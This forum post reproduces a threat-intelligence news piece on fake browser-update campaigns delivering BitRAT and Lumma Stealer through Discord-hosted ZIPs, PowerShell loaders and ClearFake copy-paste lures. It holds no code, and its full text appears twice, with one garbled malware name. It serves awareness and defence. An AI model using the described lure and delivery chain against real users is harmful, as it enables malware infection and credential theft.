Tomcat
Professional
- Messages
- 2,689
- Reaction score
- 929
- Points
- 113
How insidious BitRAT and Lumma Stealer deceive users, disguising themselves as legitimate updates.
Fake browser updates are actively used to spread Remote Access Trojans (RAT) and other malware such as BitRAT and Lumma Stealer (also known as LummaC2).
According to a recent report by cybersecurity company eSentire, fake browser updates lead to a host of malware infections, including the widely known Socialolish. In April 2024, the spread of FakeBat malware was noticed through similar fake update mechanisms.
The attack begins when a potential victim visits an infected website containing JavaScript code that redirects users to a fake browser update page ("chatgpt-app [.] cloud"). This page contains a link to download the ZIP archive ("Update.zip") hosted on the Discord platform, which is automatically downloaded to the victim's device.
The use of Discord as an attack vector is becoming increasingly common: a recent analysis from Bitdefender revealed more than 50,000 dangerous links spreading malware, phishing campaigns, and spam over the past six months.
The ZIP archive contains a JavaScript file ("Update.js"), which starts execution of PowerShell scripts. These scripts load additional payloads, including BitRAT and Lumma Stealer, from a remote server as PNG files.
It also loads PowerShell scripts to ensure persistence and a loader based on it .NET, used to run the final stage of malware. eSentire experts suggest that the downloader is advertised as a "malware delivery service" because it is used to distribute both BitRAT and Lumma Stealer.
BitRAT is a multi-functional RAT that allows attackers to collect data, mine cryptocurrency, download additional binary files, and remotely manage infected devices. At the same time, Lumma Stealer, available for $250-1000 per month from August 2022, can capture information from web browsers, crypto wallets, and other sources.
eSentire notes that decoy in the form of a fake browser update has become a popular method of penetrating devices and networks, demonstrating the ability of attackers to use trusted names for maximum reach and impact.
Such attacks often use Drive-by download techniques and malicious advertising. A recent report from ReliaQuest describes a new version of the ClearFake campaign, in which users are tricked into manually copying and executing malicious PowerShell code under the guise of a browser update.
Attackers use fake web pages that claim that "an error occurred while displaying this web page" and offer to install the root certificate by following a series of steps, including copying and executing hidden PowerShell code.
Once executed, the PowerShell code performs several functions, including clearing the DNS cache, displaying a message, downloading additional PowerShell code, and installing the LummaC2 malware.
Lumma Stealer has become one of the most common information thieves in 2023, along with RedLine and Raccoon. The number of LummaC2-generated journals offered for sale increased by 110% from the third to fourth quarter of 2023. The high success rate of LummaC2 is attributed to its effectiveness in infiltrating systems and extracting sensitive data without detection.
As part of their protective activities, eSentire specialists were able to quickly identify suspicious activity and isolate the infected device in the client's system. Indicators of compromise of identified threats can be viewed here.
This incident highlights the importance of raising awareness among users about the authenticity of update notifications and the need to download updates only from trusted sources.
Fake browser updates are actively used to spread Remote Access Trojans (RAT) and other malware such as BitRAT and Lumma Stealer (also known as LummaC2).
According to a recent report by cybersecurity company eSentire, fake browser updates lead to a host of malware infections, including the widely known Socialolish. In April 2024, the spread of FakeBat malware was noticed through similar fake update mechanisms.
The attack begins when a potential victim visits an infected website containing JavaScript code that redirects users to a fake browser update page ("chatgpt-app [.] cloud"). This page contains a link to download the ZIP archive ("Update.zip") hosted on the Discord platform, which is automatically downloaded to the victim's device.
The use of Discord as an attack vector is becoming increasingly common: a recent analysis from Bitdefender revealed more than 50,000 dangerous links spreading malware, phishing campaigns, and spam over the past six months.
The ZIP archive contains a JavaScript file ("Update.js"), which starts execution of PowerShell scripts. These scripts load additional payloads, including BitRAT and Lumma Stealer, from a remote server as PNG files.
It also loads PowerShell scripts to ensure persistence and a loader based on it .NET, used to run the final stage of malware. eSentire experts suggest that the downloader is advertised as a "malware delivery service" because it is used to distribute both BitRAT and Lumma Stealer.
BitRAT is a multi-functional RAT that allows attackers to collect data, mine cryptocurrency, download additional binary files, and remotely manage infected devices. At the same time, Lumma Stealer, available for $250-1000 per month from August 2022, can capture information from web browsers, crypto wallets, and other sources.
eSentire notes that decoy in the form of a fake browser update has become a popular method of penetrating devices and networks, demonstrating the ability of attackers to use trusted names for maximum reach and impact.
Such attacks often use Drive-by download techniques and malicious advertising. A recent report from ReliaQuest describes a new version of the ClearFake campaign, in which users are tricked into manually copying and executing malicious PowerShell code under the guise of a browser update.
Attackers use fake web pages that claim that "an error occurred while displaying this web page" and offer to install the root certificate by following a series of steps, including copying and executing hidden PowerShell code.
Once executed, the PowerShell code performs several functions, including clearing the DNS cache, displaying a message, downloading additional PowerShell code, and installing the LummaC2 malware.
Lumma Stealer has become one of the most common information thieves in 2023, along with RedLine and Raccoon. The number of LummaC2-generated journals offered for sale increased by 110% from the third to fourth quarter of 2023. The high success rate of LummaC2 is attributed to its effectiveness in infiltrating systems and extracting sensitive data without detection.
As part of their protective activities, eSentire specialists were able to quickly identify suspicious activity and isolate the infected device in the client's system. Indicators of compromise of identified threats can be viewed here.
This incident highlights the importance of raising awareness among users about the authenticity of update notifications and the need to download updates only from trusted sources.
